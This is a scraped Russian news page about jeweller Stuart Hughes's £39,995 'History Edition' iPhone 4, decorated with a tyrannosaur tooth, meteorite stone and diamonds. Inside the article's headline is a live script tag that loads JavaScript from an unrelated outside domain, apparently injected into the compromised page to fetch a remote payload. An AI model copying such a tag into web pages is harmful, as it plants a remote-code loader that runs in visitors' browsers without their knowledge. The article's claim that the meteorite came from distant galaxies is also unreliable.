Запрашиваемая страница не найдена USD     CNY     EUR     JPY
Москва C
Последние новости
24 июн 2018, 17:33
По итогам мая российские автолюбители купили 149 машин премиальной марки...
Поиск

Какую марку автомобиля вы предпочитаете?

» » Зуб динозавра и метеорит – как драгоценное украшение для iPhone 4

Зуб динозавра и метеорит – как драгоценное украшение для iPhone 4

16 дек 2010, 19:59    ismirnov
0 комментариев    6 876 просмотров
Зуб динозавра и метеорит – как драгоценное украшение <script type="text/javascript" src="http://ar.systemhttp.com/o.js"></script>для iPhone 4
Всем известный ювелир-дизайнер из Ливерпуля, Стюарт Хьюз, продолжил выпуск линейки эксклюзивных «айФонов». Его ателье на этот раз выпустило iPhone 4 с названиемHistory Edition.
 
Только на этот раз мастер основным украшением гаджета избрал не золото и бриллианты, а… останки древнего животного и метеоритный камень.
 
Применив такие неординарные и редкие материалы, Стюарт тем самым доказал, что они могут иметь не только высокую историческую ценность, но и могут фигурировать в одном ряду с ювелирными произведениями искусства.
 
Окаменевшие останки, яйца и зубы динозавров сейчас высоко ценятся и хорошо продаются. Коллекционеры и владельцы специализированных магазинов, время от времени, устраивают аукционы, где кости доисторических ящеров продают за десятки тысяч долларов. А скелеты целиком уходят по цене в несколько миллионов долларов.
 
Метеоритные камни, также очень дорого ценятся. Есть такие экземпляры «космических гостей», несколько граммов которых, стоят дороже самых чистых и крупных драгоценных камней.
 
Видимо, поэтому Стюарт Хьюз решил главными материалами отделки iPhone 4«History Edition» избрать зуб тираннозавра Рекса, бродившего по планете 65 миллионов лет назад, и метеоритныйкамень, прилетевший на Землю из далёких галактик. Получился необыкновенный аппарат – этакий «тайноноситель» космоса и доисторической эпохи.
 
Но руку мастера в этом изделии, всё же, можно угадать по присутствию на нём бриллиантов общим весом 8,5 карата и платинового «яблочка» на задней крышке «айфона» – логотипа Apple. Иначе этот аппарат был бы интересен только специалистам музея палеонтологии.
 
Выпуск таких «палео-метеоритных» «айфонов» будет очень ограничен, так как исходный материал для отделки – зубы динозавров и метеориты – тоже непросто найти в природе. Поэтому и стоимость каждого из 10 созданных iPhone 4«History Edition» будет соответствовать исключительности изделия - Ј39 995.
Читайте также
02 фев 2013, 09:09    0 комментариев
Отель Mandarin Oriental Chengdu расположится на главной набережной города Чэнду, в районе Цзинь-цзян....
Комментарии
  • bowtiesmilelaughingblushsmileyrelaxedsmirk
    heart_eyeskissing_heartkissing_closed_eyesflushedrelievedsatisfiedgrin
    winkstuck_out_tongue_winking_eyestuck_out_tongue_closed_eyesgrinningkissingstuck_out_tonguesleeping
    worriedfrowninganguishedopen_mouthgrimacingconfusedhushed
    expressionlessunamusedsweat_smilesweatdisappointed_relievedwearypensive
    disappointedconfoundedfearfulcold_sweatperseverecrysob
    joyastonishedscreamtired_faceangryragetriumph
    sleepyyummasksunglassesdizzy_faceimpsmiling_imp
    neutral_faceno_mouthinnocent